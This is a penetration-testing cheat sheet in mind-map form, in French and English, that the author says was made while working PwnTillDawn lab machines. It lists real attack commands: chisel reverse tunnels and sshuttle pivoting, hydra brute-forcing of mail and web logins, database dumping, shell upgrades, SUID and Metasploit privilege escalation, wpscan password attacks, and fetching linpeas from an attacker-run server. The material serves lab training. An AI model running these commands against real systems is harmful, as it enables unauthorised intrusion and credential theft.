Kategorier: Alle - exploitation - web - privilege

af Anthony Guilbert 1 måned siden

139

Pwntilldawn Mindmap FULL

When engaging in cybersecurity tasks such as penetration testing, understanding various techniques and tools is critical. Essential methods include pivoting and tunneling, where one gains access to different parts of a network using tools like SSH tunneling and port forwarding.

Pwntilldawn Mindmap FULL

Pwntilldawn FULL

Mindmap I did while doing some Pwntilldawn boxes

Pivoting / Tunneling

Tunneling & Port Forwarding
Si on a un acces SSH

sshuttle -r user@ip -N

Web en écoute sur localhost

Sur la victime

./chisel client ip_host:7777 R:8080:127.0.0.1:8080

Ne pas oublier d'adapter le port 8080 selon les situations

Sur l'host

chisel server -port 7777 --reverse

Verifier ce qui écoute sur localhost

NMAP

nmap -sV -sC -T5 -p- ip
Nmap Automator
sudo nmap -sF -p1-100 -T4

Protocoles divers

DNS
! AXFR !

dig @mortysserver.com mortysserver.com axfr

Ajout dans /etc/hosts si besoin

Exemple : 10.150.150.57 rickscontrolpanel.mortysserver.com

SSH
Test de se co pour la bannière
Connexion si on a la clé privée

ssh -i id_rsa user@ip

POP3
hydra -l operator -P wordlist.txt ipip pop3
Mysql
mysql -h localhost -u sql_user -p
mysqldump -u root -p --all-databases > alldb.sql
FTP
Login anon à vérif
NFS
sudo mount -t nfs ip:/remote /local
showmount -e IP
sudo umount 10.150.150.59:/nfsroot
rpcinfo IP
SMTP
hydra -l operator -P wordlist.txt ipip smtp

Misc

netstat -antup
netstat -antup
Dumb shell upgrade
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
script /dev/null -qc /bin/bash
Si besoin des erreurs mais pas affichée ( ex webshell php )
Ajout de "2>fichier" apres la commande

puis faire un cat du fichier

Trouver un flag

@for /r C:\ %i in (FLAG??.txt) do @echo %i && @type "%i"
Linux
find / -type f -name 'FLAG[0-9][0-9]' 2>/dev/null
find ./* | grep FLAG3
find / -type f -name 'FLAG[0-9].txt' 2>/dev/null
find / -name FLAG6.txt 2>/dev/null

Privesc

SUID
find / -perm -u=s -type f 2>/dev/null
searchsploit
searchsploit -m chemin
searchsploit xxxx
Python Library Hijacking
Script qui tourne en root avec des imports de librairies
LXC/LXD
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation
Metasploit
Upgrade session : sessions -u
Windows
Shell

Upgrade shell

sessions -u id

ps --> migrate pid

msfconsole

multi/recon/localexploitsuggester

linpeas
sudo python3 -m http.server port ( attaquant ) et wget
Lien symbolique
ln -s /root /home/michael/importantfiles/rootbackup

WEB

Wordpress
Bruteforce

wpscan --url url_wordpress --passwords wordlist

Enumération users

wpscan --url url --enumerate u

wpscan --url https://www.hackinprovence.fr/ -e u
Check template et plugins vulnérables

wpscan --url url --enumerate vp,vt

PHP Filters
python3 script.py --chain ''

https://github.com/synacktiv/phpfilterchaingenerator/blob/main/phpfilterchaingenerator.py

Enumération
Path

Dirsearch

FeroxBuster

feroxbuster -u url -w ~/Desktop/SecLists-master/Discovery/Web-Content/common.txt --filter-status 404

feroxbuster -u http://example.com -w wordlist -x php,html,txt -v -o output.txt --filter-status 404

Bruteforce Forms
Hydra

hydra -l admin -P SecLists-master/rockyou.txt 10.150.150.38 -s 30609 -t 20 http-post-form "/jacegisecurity_check:jusername=^USER^&jpassword=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"

hydra -l operator -P wordlist.txt 10.150.150.56

Stegano

searchsploit
Depixelise
Unredactor
Depix

python3 depix.py -p pixel_image -s images/searchimages/image.png

Stereogram
https://piellardj.github.io/stereogram-solver/
Aperisolve
Steghide
steghide extract -sf screen.jpeg